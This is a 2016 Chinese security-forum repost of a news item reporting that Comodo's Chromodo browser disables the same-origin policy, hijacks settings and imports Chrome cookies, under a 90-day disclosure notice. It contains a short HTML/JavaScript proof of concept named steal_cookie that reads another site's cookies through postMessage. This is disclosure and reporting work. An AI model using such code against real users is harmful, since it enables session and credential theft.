首页
社区
课程
招聘
Chromodo浏览器禁用同源策略后网络安全消失
发表于: 2016-2-16 17:11 1585

Chromodo浏览器禁用同源策略后网络安全消失

2016-2-16 17:11
1585
新闻链接:http://www.2cto.com/News/201602/489044.html
   新闻时间:2016-02-03
   新闻正文:Comodo(科摩多)是美国的一家软件公司,是世界优秀的IT安全服务提供商和SSL证书的供应商之一,总部设在新泽西州泽西城,成立于1998年。其产品涉及范围较广,包含数字证书,安全软件以及安全周边软件。其免费产品也很多,包括安全套装在内均有免费版。

总的来说,Comodo的产品以严谨出名,防火墙严格的设置规则受到很多用户的喜爱,但该公司的反病毒产品功能并不是很强。

当你安装了Comodo网络安全套件之后,你将发现Comodo会默认安装一款名为Chromodo的新型网页浏览器,并且还会将其设为系统的默认浏览器。除此之外,系统中所有浏览器的快捷方式都会被Chromodo的地址所替换,该浏览器还会从Chrome浏览器中导入所有的设置以及cookie文件等信息。而且浏览器还会在某些情况下劫持主机的DNS设置。

https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php

Comodo将Chromodo浏览器描述为-“速度最快,安全等级最高,隐私保护最全面的浏览器”。但是实际上,这款浏览器并没有给用户提供任何的网络安全保护。因为他们禁用了同源策略!
具体示例请查看以下代码:
<html>
<head></head>
<body>
<script>
function steal_cookie(obj)
{
    // Wait for the page to load
    setTimeout(function() {
        obj.postMessage(JSON.stringify({
            command: "execCode",
            code:    "(document.cookie)",
        }), "*");
    }, 2000);
}
</script>
<a href="steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
</body>
</html>
在此,我们将遵循90天的漏洞披露期限。如果90天之后,该公司没有提供相应的修复补丁,那么我们将会把这个漏洞的详细信息公布出来。

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//